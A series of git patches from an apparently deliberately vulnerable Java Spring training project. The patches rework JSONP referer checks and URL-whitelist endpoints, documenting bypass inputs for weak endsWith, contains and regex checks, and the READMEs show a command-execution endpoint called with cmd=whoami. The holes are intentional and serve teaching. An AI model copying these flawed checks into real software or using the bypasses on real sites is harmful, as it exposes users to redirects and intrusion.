--- a/src/main/java/org/joychou/controller/JSONP.java
+++ b/src/main/java/org/joychou/controller/JSONP.java
@@ -1,6 +1,6 @@
 package org.joychou.controller;
 
-import org.joychou.utils.Security;
+import org.joychou.security.SecurityUtil;
 import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.*;
 import javax.servlet.http.HttpServletRequest;
@@ -17,7 +17,7 @@
 public class JSONP {
 
     protected static String info = "{\"name\": \"JoyChou\", \"phone\": \"18200001111\"}";
-    protected static String[] urlwhitelist = {"joychou.com", "joychou.me"};
+    protected static String[] urlwhitelist = {"joychou.com", "joychou.org"};
 
 
     // http://localhost:8080/jsonp/referer?callback=test
@@ -31,19 +31,19 @@ private static String referer(HttpServletRequest request, HttpServletResponse re
     }
 
     /**
-     * Desc: 直接访问不限制Referer，非直接访问限制Referer (开发同学喜欢这样进行JSONP测试)
-     * URL:  http://localhost:8080/jsonp/emptyReferer?callback=test
+     * 直接访问不限制Referer，非直接访问限制Referer (开发同学喜欢这样进行JSONP测试)
+     * http://localhost:8080/jsonp/emptyReferer?callback=test
+     *
      */
     @RequestMapping("/emptyReferer")
     @ResponseBody
     private static String emptyReferer(HttpServletRequest request, HttpServletResponse response) {
         String referer = request.getHeader("referer");
         response.setHeader("Access-Control-Allow-Origin", "*");
-        Security sec = new Security();
 
         // 如果referer不为空，并且referer不在安全域名白名单内，return error
         // 导致空referer就会绕过校验。开发同学为了方便测试，不太喜欢校验空Referer
-        if (null != referer && !sec.checkSafeUrl(referer, urlwhitelist)) {
+        if (null != referer && !SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist)) {
             return "error";
         }
 
@@ -58,9 +58,8 @@ private static String sec(HttpServletRequest request, HttpServletResponse respon
         // JSONP的跨域设置
         response.setHeader("Access-Control-Allow-Origin", "*");
         String referer = request.getHeader("referer");
-        Security sec = new Security();
 
-        if (!sec.checkSafeUrl(referer, urlwhitelist)) {
+        if (!SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist)) {
             return "error";
         }
 
diff --git a/src/main/java/org/joychou/controller/URLWhiteList.java b/src/main/java/org/joychou/controller/URLWhiteList.java
index f3b75693..1b33de64 100644
--- a/src/main/java/org/joychou/controller/URLWhiteList.java
+++ b/src/main/java/org/joychou/controller/URLWhiteList.java
@@ -9,6 +9,7 @@
 import javax.servlet.http.HttpServletRequest;
 import java.net.URI;
 import java.net.URL;
+import java.util.ArrayList;
 import java.util.regex.Matcher;
 import java.util.regex.Pattern;
 
@@ -23,130 +24,142 @@
 public class URLWhiteList {
 
 
-    private String urlwhitelist = "joychou.com";
+    private String urlwhitelist[] = {"joychou.org", "joychou.com"};
 
-
-    // 绕过方法bypassjoychou.com
+    /**
+     * @desc 绕过方法bypassjoychou.org
+     * @usage http://localhost:8080/url/endswith?url=http://aaajoychou.org
+     */
     @RequestMapping("/endswith")
     @ResponseBody
     public String endsWith(HttpServletRequest request) throws Exception{
         String url = request.getParameter("url");
-        System.out.println(url);
         URL u = new URL(url);
         String host = u.getHost().toLowerCase();
-        String rootDomain = InternetDomainName.from(host).topPrivateDomain().toString();
 
-        if (rootDomain.endsWith(urlwhitelist)) {
-            return "URL is legal";
-        } else {
-            return "URL is illegal";
+        for (String domain: urlwhitelist){
+            if (host.endsWith(domain)) {
+                return "Good url.";
+            }
         }
+        return "Bad url.";
     }
 
-    // 绕过方法joychou.com.bypass.com  bypassjoychou.com
+    /**
+     * @desc 绕过方法joychou.org.bypass.com  bypassjoychou.org
+     * @usage http://localhost:8080/url/contains?url=http://joychou.org.bypass.com http://bypassjoychou.org
+     */
     @RequestMapping("/contains")
     @ResponseBody
     public String contains(HttpServletRequest request) throws Exception{
         String url = request.getParameter("url");
         URL u = new URL(url);
         String host = u.getHost().toLowerCase();
-        String rootDomain = InternetDomainName.from(host).topPrivateDomain().toString();
 
-        if (rootDomain.contains(urlwhitelist)) {
-            return "URL is legal";
-        } else {
-            return "URL is illegal";
+        for (String domain: urlwhitelist){
+            if (host.contains(domain)) {
+                return "Good url.";
+            }
         }
+        return "Bad url.";
     }
 
-    // 绕过方法bypassjoychou.com，代码功能和endsWith一样/
+
+    /**
+     * @desc 绕过方法bypassjoychou.org，代码功能和endsWith一样
+     * @usage http://localhost:8080/url/regex?url=http://aaajoychou.org
+     */
     @RequestMapping("/regex")
     @ResponseBody
     public String regex(HttpServletRequest request) throws Exception{
         String url = request.getParameter("url");
         URL u = new URL(url);
         String host = u.getHost().toLowerCase();
-        String rootDomain = InternetDomainName.from(host).topPrivateDomain().toString();
 
-        Pattern p = Pattern.compile("joychou\\.com");
-        Matcher m = p.matcher(rootDomain);
+        Pattern p = Pattern.compile("joychou\\.org$");
+        Matcher m = p.matcher(host);
         if (m.find()) {
-            return "URL is legal";
+            return "Good url.";
         } else {
-            return "URL is illegal";
+            return "Bad url.";
         }
     }
 
 
+    /**
+     * @desc 绕过方法joychou.org.bypass.com  bypassjoychou.org，代码功能和 contains 一样
+     * @usage http://localhost:8080/url/indexof?url=http://joychou.org.bypass.com http://bypassjoychou.org
+     */
     @RequestMapping("/indexof")
     @ResponseBody
     public String indexOf(HttpServletRequest request) throws Exception{
         String url = request.getParameter("url");
-        // indexof返回-1，表示没有匹配到字符串
-        if (-1 == url.indexOf(urlwhitelist)) {
-            return "URL is illegal";
-        } else {
-            return "URL is legal";
+        URL u = new URL(url);
+        String host = u.getHost();
+        // indexOf为-1，表示没有匹配到字符串
+        for (String domain: urlwhitelist){
+            if (host.indexOf(domain) != -1) {
+                return "Good url.";
+            }
         }
+        return "Bad url.";
     }
 
-    // URL类getHost方法被绕过造成的安全问题
-    // 绕过姿势：http://localhost:8080/url/urlVul?url=http://www.taobao.com%23@joychou.com/, URL类getHost为joychou.com
-    // 直接访问http://www.taobao.com#@joychou.com/，浏览器请求的是www.taobao.com
-    @RequestMapping("/urlVul")
+    /**
+     * @desc 用java.net.URL类的getHost被绕过情况
+     * @usage https://github.com/JoyChou93/java-sec-code/wiki/SecurityUtil-whtielist-Bypass
+     */
+    @RequestMapping("/url_bypass")
     @ResponseBody
-    public String urlVul(HttpServletRequest request) throws Exception{
+    public String url_bypass(HttpServletRequest request) throws Exception{
         String url = request.getParameter("url");
         System.out.println("url:  " + url);
         URL u = new URL(url);
         // 判断是否是http(s)协议
         if (!u.getProtocol().startsWith("http") && !u.getProtocol().startsWith("https")) {
-            return "URL is not http or https";
+            return "Url is not http or https";
         }
         String host = u.getHost().toLowerCase();
         System.out.println("host:  " + host);
-        // 如果非顶级域名后缀会报错
-        String rootDomain = InternetDomainName.from(host).topPrivateDomain().toString();
 
-        if (rootDomain.equals(urlwhitelist)) {
-            return "URL is legal";
+        if (host.endsWith("." + urlwhitelist)) {
+            return "Good url.";
         } else {
-            return "URL is illegal";
+            return "Bad url.";
         }
     }
 
-    // 利用InternetDomainName库获取一级域名的安全代码 (一级域名白名单)
+
+    /**
+     * @desc 利用InternetDomainName库获取一级域名的安全代码 (一级域名白名单)
+     */
     @RequestMapping("/seccode")
     @ResponseBody
     public String seccode(HttpServletRequest request) throws Exception{
         String url = request.getParameter("url");
-        System.out.println("url:  " + url);
+
         URI uri = new URI(url);
-        URL u = new URL(url);
         // 判断是否是http(s)协议
-        if (!u.getProtocol().startsWith("http") && !u.getProtocol().startsWith("https")) {
-            return "URL is not http or https";
+        if (!url.startsWith("http://") && !url.startsWith("https://")) {
+            return "SecurityUtil is not http or https";
         }
+
         // 使用uri获取host
         String host = uri.getHost().toLowerCase();
-        System.out.println("host:  " + host);
 
         // 如果非顶级域名后缀会报错
         String rootDomain = InternetDomainName.from(host).topPrivateDomain().toString();
 
         if (rootDomain.equals(urlwhitelist)) {
-            return "URL is legal";
+            return "Good url.";
         } else {
-            return "URL is illegal";
+            return "Bad url.";
         }
     }
 
     /**
      * @desc 自定义一级域名白名单
      * @usage http://localhost:8080/url/seccode1?url=http://aa.taobao.com
-     * @param request
-     * @return
-     * @throws Exception
      */
     @RequestMapping("/seccode1")
     @ResponseBody
@@ -154,59 +167,79 @@ public String seccode1(HttpServletRequest request) throws Exception{
 
         // 定义一级域名白名单list，用endsWith加上.判断
         String whiteDomainlists[] = {"taobao.com", "tmall.com"};
-
         String url = request.getParameter("url");
-        System.out.println("url:  " + url);
+
         URI uri = new URI(url);
-        URL u = new URL(url);
         // 判断是否是http(s)协议
-        if (!u.getProtocol().startsWith("http") && !u.getProtocol().startsWith("https")) {
-            return "URL is not http or https";
+        if (!url.startsWith("http://") && !url.startsWith("https://")) {
+            return "SecurityUtil is not http or https";
         }
+
         // 使用uri获取host
         String host = uri.getHost().toLowerCase();
-        System.out.println("host:  " + host);
 
         for (String domain: whiteDomainlists){
             if (host.endsWith("." + domain)) {
-                return "good url";
+                return "Good url.";
             }
         }
 
-        return "bad url";
+        return "Bad url.";
     }
 
     /**
      * @desc 自定义多级域名白名单
      * @usage http://localhost:8080/url/seccode2?url=http://ccc.bbb.taobao.com
-     * @param request
-     * @return
-     * @throws Exception
      */
     @RequestMapping("/seccode2")
     @ResponseBody
     public String seccode2(HttpServletRequest request) throws Exception{
-
         // 定义多级域名白名单，判断使用equals
         String whiteDomainlists[] = {"aaa.taobao.com", "ccc.bbb.taobao.com"};
-
         String url = request.getParameter("url");
-        System.out.println("url:  " + url);
+
         URI uri = new URI(url);
-        URL u = new URL(url);
         // 判断是否是http(s)协议
-        if (!u.getProtocol().startsWith("http") && !u.getProtocol().startsWith("https")) {
-            return "URL is not http or https";
+        if (!url.startsWith("http://") && !url.startsWith("https://")) {
+            return "SecurityUtil is not http or https";
         }
         // 使用uri获取host
         String host = uri.getHost().toLowerCase();
-        System.out.println("host:  " + host);
 
         for (String domain: whiteDomainlists){
             if (host.equals(domain)) {
-                return "good url";
+                return "Good url.";
             }
         }
-        return "bad url";
+        return "Bad url.";
+    }
+
+    /**
+     * @desc 自定义多级域名白名单
+     * @usage http://localhost:8080/url/seccode3?url=http://ccc.bbb.taobao.com
+     */
+    @RequestMapping("/seccode3")
+    @ResponseBody
+    public String seccode3(HttpServletRequest request) throws Exception{
+
+        // 定义多级域名白名单
+        ArrayList<String> whiteDomainlists = new ArrayList<String>();
+        whiteDomainlists.add("bbb.taobao.com");
+        whiteDomainlists.add("ccc.bbb.taobao.com");
+
+        String url = request.getParameter("url");
+        URI uri = new URI(url);
+
+        // 判断是否是http(s)协议
+        if (!url.startsWith("http://") && !url.startsWith("https://")) {
+            return "SecurityUtil is not http or https";
+        }
+        // 使用uri获取host
+        String host = uri.getHost().toLowerCase();
+
+        if (whiteDomainlists.indexOf(host) != -1) {
+            return "Good url.";
+        }
+        return "Bad url.";
     }
 }
diff --git a/src/main/java/org/joychou/security/SecurityUtil.java b/src/main/java/org/joychou/security/SecurityUtil.java
new file mode 100644
index 00000000..0d444f55
--- /dev/null
+++ b/src/main/java/org/joychou/security/SecurityUtil.java
@@ -0,0 +1,39 @@
+package org.joychou.security;
+
+
+import java.net.URI;
+
+public class SecurityUtil {
+
+    /**
+     * 通过endsWith判断URL是否合法
+     *
+     * @param url
+     * @return 安全url返回true，危险url返回false
+     */
+    public static Boolean checkURLbyEndsWith(String url, String[] urlwhitelist) {
+        try {
+            URI uri = new URI(url);
+            // 判断是否是http(s)协议
+            if (!url.startsWith("http://") && !url.startsWith("https://")) {
+                return false;
+            }
+
+            // 使用uri获取host
+            String host = uri.getHost().toLowerCase();
+            for (String whitelist: urlwhitelist){
+                if (host.endsWith("." + whitelist)) {
+                    return true;
+                }
+            }
+
+            return false;
+        } catch (Exception e) {
+            System.out.println(e.toString());
+            return false;
+        }
+    }
+
+
+
+}
\ No newline at end of file
diff --git a/src/main/java/org/joychou/security/secFilter.java b/src/main/java/org/joychou/security/secFilter.java
new file mode 100644
index 00000000..a42ae4eb
--- /dev/null
+++ b/src/main/java/org/joychou/security/secFilter.java
@@ -0,0 +1,54 @@
+package org.joychou.security;
+
+import org.springframework.http.MediaType;
+
+import javax.servlet.*;
+import javax.servlet.annotation.WebFilter;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.io.IOException;
+import org.apache.commons.lang.StringUtils;
+
+
+/**
+ * usage: 对所有带有callback参数的get请求做referer校验，如果校验失败返回403页面
+ * desc:  除了以下代码，还需要在Application.java中添加@ServletComponentScan注解
+ */
+@WebFilter(filterName = "referSecCheck", urlPatterns = "/*")
+public class secFilter implements Filter{
+
+    @Override
+    public void init(FilterConfig filterConfig) throws ServletException {
+
+    }
+
+    @Override
+    public void doFilter(ServletRequest req, ServletResponse res, FilterChain filterChain)
+            throws IOException, ServletException {
+
+        HttpServletRequest request = (HttpServletRequest) req;
+        HttpServletResponse response = (HttpServletResponse) res;
+
+        String refer = request.getHeader("referer");
+        String referWhitelist[] = {"joychou.org", "joychou.com"};
+
+        // get method and includes callback parameter
+        System.out.println(request.getMethod());
+        if (request.getMethod().equals("GET") && StringUtils.isNotBlank(request.getParameter("callback")) ){
+            // if check referer failed, display 403 forbidden page.
+            if (!SecurityUtil.checkURLbyEndsWith(refer, referWhitelist)){
+                response.setContentType(MediaType.TEXT_HTML_VALUE); // content-type: text/html
+                response.setStatus(HttpServletResponse.SC_FORBIDDEN); // 403 forbidden
+                response.getWriter().write("Referer check failed. 403 Forbidden.");  // response
+                return;
+            }
+        }
+
+        filterChain.doFilter(req, res);
+    }
+
+    @Override
+    public void destroy() {
+
+    }
+}
diff --git a/src/main/java/org/joychou/utils/Security.java b/src/main/java/org/joychou/utils/Security.java
deleted file mode 100644
index d283d34c..00000000
--- a/src/main/java/org/joychou/utils/Security.java
+++ /dev/null
@@ -1,59 +0,0 @@
-package org.joychou.utils;
-
-import com.google.common.net.InternetDomainName;
-
-import javax.imageio.ImageIO;
-import java.awt.image.BufferedImage;
-import java.io.File;
-import java.io.IOException;
-import java.net.URI;
-import java.net.URL;
-
-public class Security {
-    /**
-     * @param url
-     * @return 安全url返回true，危险url返回false
-     */
-    public static Boolean checkSafeUrl(String url, String[] urlwhitelist) {
-        try {
-            URL u = new URL(url);
-            URI uri = new URI(url);
-            // 判断是否是http(s)协议
-            if (!u.getProtocol().startsWith("http") && !u.getProtocol().startsWith("https")) {
-                System.out.println("The protocol of url is not http or https.");
-                return false;
-            }
-            // 使用uri获取host
-            String host = uri.getHost().toLowerCase();
-
-            // 如果非顶级域名后缀会报错
-            String rootDomain = InternetDomainName.from(host).topPrivateDomain().toString();
-
-            for (String whiteurl : urlwhitelist) {
-                if (rootDomain.equals(whiteurl)) {
-                    return true;
-                }
-            }
-
-            System.out.println("Url is not safe.");
-            return false;
-        } catch (Exception e) {
-            System.out.println(e.toString());
-            e.printStackTrace();
-            return false;
-        }
-    }
-
-
-    /**
-     * @param file
-     * @desc 判断文件内容是否是图片
-     */
-    public static boolean isImage(File file) throws IOException {
-        BufferedImage bi = ImageIO.read(file);
-        if (bi == null) {
-            return false;
-        }
-        return true;
-    }
-}
\ No newline at end of file

From 0746f9ddb91f83acc217e709092c085ec0383adf Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Wed, 19 Jun 2019 15:12:54 +0800
Subject: [PATCH 026/108] redirect 403 forbidden page

---
 src/main/java/org/joychou/security/secFilter.java | 9 +++------
 1 file changed, 3 insertions(+), 6 deletions(-)

diff --git a/src/main/java/org/joychou/security/secFilter.java b/src/main/java/org/joychou/security/secFilter.java
index a42ae4eb..e9bdf653 100644
--- a/src/main/java/org/joychou/security/secFilter.java
+++ b/src/main/java/org/joychou/security/secFilter.java
@@ -15,7 +15,7 @@
  * desc:  除了以下代码，还需要在Application.java中添加@ServletComponentScan注解
  */
 @WebFilter(filterName = "referSecCheck", urlPatterns = "/*")
-public class secFilter implements Filter{
+public class secFilter implements Filter {
 
     @Override
     public void init(FilterConfig filterConfig) throws ServletException {
@@ -33,13 +33,10 @@ public void doFilter(ServletRequest req, ServletResponse res, FilterChain filter
         String referWhitelist[] = {"joychou.org", "joychou.com"};
 
         // get method and includes callback parameter
-        System.out.println(request.getMethod());
         if (request.getMethod().equals("GET") && StringUtils.isNotBlank(request.getParameter("callback")) ){
-            // if check referer failed, display 403 forbidden page.
+            // if check referer failed, redirect 403 forbidden page.
             if (!SecurityUtil.checkURLbyEndsWith(refer, referWhitelist)){
-                response.setContentType(MediaType.TEXT_HTML_VALUE); // content-type: text/html
-                response.setStatus(HttpServletResponse.SC_FORBIDDEN); // 403 forbidden
-                response.getWriter().write("Referer check failed. 403 Forbidden.");  // response
+                response.sendRedirect("https://test.joychou.org/error3.html");
                 return;
             }
         }

From 10e034579ccbd402b30bc519ba2d42abba45d18c Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 21 Jun 2019 20:40:53 +0800
Subject: [PATCH 027/108] add ssrf checker

---
 README.md                                     | 137 +++++++++--------
 README_zh.md                                  |  97 ++++++++++++
 java-sec-code.iml                             |   1 +
 pom-extra.xml                                 | 139 ------------------
 pom-idea.xml                                  | 125 ----------------
 pom.xml                                       |   6 +
 .../java/org/joychou/controller/CORS.java     |   7 +-
 .../org/joychou/controller/CRLFInjection.java |   6 +-
 .../java/org/joychou/controller/CSRF.java     |   8 +-
 .../org/joychou/controller/Deserialize.java   |   6 +-
 .../org/joychou/controller/FileUpload.java    |  16 +-
 .../java/org/joychou/controller/IPForge.java  |   8 +-
 .../java/org/joychou/controller/Index.java    |   6 +-
 .../java/org/joychou/controller/JSONP.java    |   2 +-
 src/main/java/org/joychou/controller/Rce.java |   8 +-
 .../java/org/joychou/controller/SPEL.java     |  12 +-
 .../java/org/joychou/controller/SQLI.java     |   6 +-
 .../java/org/joychou/controller/SSRF.java     |  32 +++-
 .../org/joychou/controller/URLRedirect.java   |  43 ++++--
 .../org/joychou/controller/URLWhiteList.java  |   6 +-
 src/main/java/org/joychou/controller/XSS.java |   6 +-
 src/main/java/org/joychou/controller/XXE.java |   6 +-
 .../org/joychou/security/SSRFChecker.java     | 137 +++++++++++++++++
 .../org/joychou/security/SecurityUtil.java    |  25 +++-
 24 files changed, 444 insertions(+), 401 deletions(-)
 create mode 100644 README_zh.md
 delete mode 100644 pom-extra.xml
 delete mode 100644 pom-idea.xml
 create mode 100644 src/main/java/org/joychou/security/SSRFChecker.java

diff --git a/README.md b/README.md
index c2fe8aca..2b4fdddc 100644
--- a/README.md
+++ b/README.md
@@ -1,111 +1,120 @@
-# Java Security Code
+# Java sec code
 
-## 介绍
 
-该项目也可以叫做Java Vulnerability Code(Java漏洞代码)。
+[中文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README.md)
 
-每个漏洞类型代码默认存在安全漏洞（除非本身不存在漏洞），相关修复代码在注释里。具体可查看每个漏洞代码和注释。
+## Introduce
 
-## 漏洞代码
+This project can also be called Java vulnerability code. 
 
-- [XXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XXE.java)
-- [SSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSRF.java)
-- [URL重定向](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLRedirect.java)
-- [IP伪造](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/IPForge.java)
-- [XSS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XSS.java)
-- [CRLF注入](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CRLFInjection.java)
-- [远程命令执行](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
-- [反序列化](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Deserialize.java)
-- [文件上传](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/FileUpload.java)
-- [SQL注入](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)
-- [URL白名单Bypass](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLWhiteList.java)
-- [Java RMI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/RMI/Server.java)
-- [Fastjson](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Fastjson.java)
+Each vulnerability type code has a security vulnerability by default unless there is no vulnerability. The relevant fix code is in the comments or code. Specifically, you can view each vulnerability code and comments.
+
+## Vulnerability Code
+
+Sort by letter.
+
+- [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback.xml)
 - [CORS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CORS.java)
+- [CRLF Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CRLFInjection.java)
+- [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/WebSecurityConfig.java)
+- [Deserialize](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Deserialize.java)
+- [Fastjson](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Fastjson.java)
+- [File Upload](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/FileUpload.java)
+- [IP Forge](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/IPForge.java)
+- [Java RMI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/RMI/Server.java)
 - [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/JSONP.java)
+- [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
 - [SPEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SPEL.java)
-- [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback.xml)
-- [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/WebSecurityConfig.java)
+- [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)
+- [SSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSRF.java)
+- [URL Redirect](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLRedirect.java)
+- [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLWhiteList.java)
+- [XSS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XSS.java)
+- [XXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XXE.java)
 
-## 漏洞说明
 
-- [Java RMI](https://github.com/JoyChou93/java-sec-code/wiki/Java-RMI)
-- [XXE](https://github.com/JoyChou93/java-sec-code/wiki/XXE)
-- [SQLI](https://github.com/JoyChou93/java-sec-code/wiki/SQL-Inject)
-- [Fastjson](https://github.com/JoyChou93/java-sec-code/wiki/Fastjson)
+## Vulnerability Description
+
+- [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/wiki/Actuators-to-RCE)
 - [CORS](https://github.com/JoyChou93/java-sec-code/wiki/CORS)
 - [CSRF](https://github.com/JoyChou93/java-sec-code/wiki/CSRF)
+- [Fastjson](https://github.com/JoyChou93/java-sec-code/wiki/Fastjson)
+- [Java RMI](https://github.com/JoyChou93/java-sec-code/wiki/Java-RMI)
 - [JSONP](https://github.com/JoyChou93/java-sec-code/wiki/JSONP)
-- [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/wiki/Actuators-to-RCE)
+- [SQLI](https://github.com/JoyChou93/java-sec-code/wiki/SQL-Inject)
 - [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/wiki/URL-whtielist-Bypass)
+- [XXE](https://github.com/JoyChou93/java-sec-code/wiki/XXE)
 - [Others](https://github.com/JoyChou93/java-sec-code/wiki/others)
 
+## How to run
 
-## 如何运行
-
+- Tomcat
+- IDEA
+- JAR
 
 ### Tomcat
 
-1. 生成war包 `mvn clean package`
-2. 将target目录的war包，cp到Tomcat的webapps目录
-3. 重启Tomcat应用
+- Exclude tomcat in pom.xml.
 
+    ```
+    <dependency>
+        <groupId>org.springframework.boot</groupId>
+        <artifactId>spring-boot-starter-web</artifactId>
+        <exclusions>
+            <exclusion>
+                <groupId>org.springframework.boot</groupId>
+                <artifactId>spring-boot-starter-tomcat</artifactId>
+            </exclusion>
+        </exclusions>
+    </dependency>
+    ```
+
+- Build war package by `mvn clean package`.
+- Copy war package to Tomcat webapps directory.
+- Start tomcat application.
+
+Example:
 
 ```
 http://localhost:8080/java-sec-code-1.0.0/rce/exec?cmd=whoami
 ```
- 
-返回
 
-``` 
+return:
+
+```
 Viarus
 ```
 
 ### IDEA
 
-如果想在IDEA中直接运行，需要在IDEA中添加Tomcat配置，步骤如下：
+Click `run` button.
 
-```
-Run -> Edit Configurations -> 添加TomcatServer(Local) -> Server中配置Tomcat路径 -> Deployment中添加Artifact选择java-sec-code:war exploded
-```
-
-![tomcat](https://github.com/JoyChou93/java-sec-code/raw/master/idea-tomcat.png)
-
-配置完成后，右上角直接点击run，即可运行。
+Example:
 
 ```
 http://localhost:8080/rce/exec?cmd=whoami
 ```
- 
-返回
 
-``` 
+return:
+
+```
 Viarus
 ```
 
----
-
-有人反馈不想额外下载Tomcat，想使用SpringBoot自带的Tomcat，所以额外说明。
-
-具体操作：执行`cp pom-idea.xml pom.xml`后，最后在IDEA中右键`Run Application`。
+### JAR
 
-### Jar包
+Change `war` to `jar` in `pom.xml`.
 
-
-有人反馈想直接打Jar包运行。具体操作：
-
-先修改pom.xml里的配置，将war改成jar
-
-``` 
-    <groupId>sec</groupId>
-    <artifactId>java-sec-code</artifactId>
-    <version>1.0.0</version>
-    <packaging>war</packaging>
+```
+<groupId>sec</groupId>
+<artifactId>java-sec-code</artifactId>
+<version>1.0.0</version>
+<packaging>war</packaging>
 ```
 
-再打包运行即可。
+Build package and run.
 
 ```
 mvn clean package -DskipTests 
-java -jar 打包后的jar包路径
-```
+java -jar target/java-sec-code-1.0.0.jar
+```
\ No newline at end of file
diff --git a/README_zh.md b/README_zh.md
new file mode 100644
index 00000000..06c18121
--- /dev/null
+++ b/README_zh.md
@@ -0,0 +1,97 @@
+# Java Security Code
+
+## 介绍
+
+该项目也可以叫做Java Vulnerability Code(Java漏洞代码)。
+
+每个漏洞类型代码默认存在安全漏洞（除非本身不存在漏洞），相关修复代码在注释里。具体可查看每个漏洞代码和注释。
+
+## 漏洞代码
+
+- [XXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XXE.java)
+- [SSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSRF.java)
+- [URL重定向](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLRedirect.java)
+- [IP伪造](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/IPForge.java)
+- [XSS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XSS.java)
+- [CRLF注入](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CRLFInjection.java)
+- [远程命令执行](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
+- [反序列化](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Deserialize.java)
+- [文件上传](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/FileUpload.java)
+- [SQL注入](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)
+- [URL白名单Bypass](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLWhiteList.java)
+- [Java RMI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/RMI/Server.java)
+- [Fastjson](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Fastjson.java)
+- [CORS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CORS.java)
+- [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/JSONP.java)
+- [SPEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SPEL.java)
+- [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback.xml)
+- [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/WebSecurityConfig.java)
+
+## 漏洞说明
+
+- [Java RMI](https://github.com/JoyChou93/java-sec-code/wiki/Java-RMI)
+- [XXE](https://github.com/JoyChou93/java-sec-code/wiki/XXE)
+- [SQLI](https://github.com/JoyChou93/java-sec-code/wiki/SQL-Inject)
+- [Fastjson](https://github.com/JoyChou93/java-sec-code/wiki/Fastjson)
+- [CORS](https://github.com/JoyChou93/java-sec-code/wiki/CORS)
+- [CSRF](https://github.com/JoyChou93/java-sec-code/wiki/CSRF)
+- [JSONP](https://github.com/JoyChou93/java-sec-code/wiki/JSONP)
+- [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/wiki/Actuators-to-RCE)
+- [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/wiki/URL-whtielist-Bypass)
+- [Others](https://github.com/JoyChou93/java-sec-code/wiki/others)
+
+
+## 如何运行
+
+
+### Tomcat
+
+1. 生成war包 `mvn clean package`
+2. 将target目录的war包，cp到Tomcat的webapps目录
+3. 重启Tomcat应用
+
+
+```
+http://localhost:8080/java-sec-code-1.0.0/rce/exec?cmd=whoami
+```
+ 
+返回
+
+``` 
+Viarus
+```
+
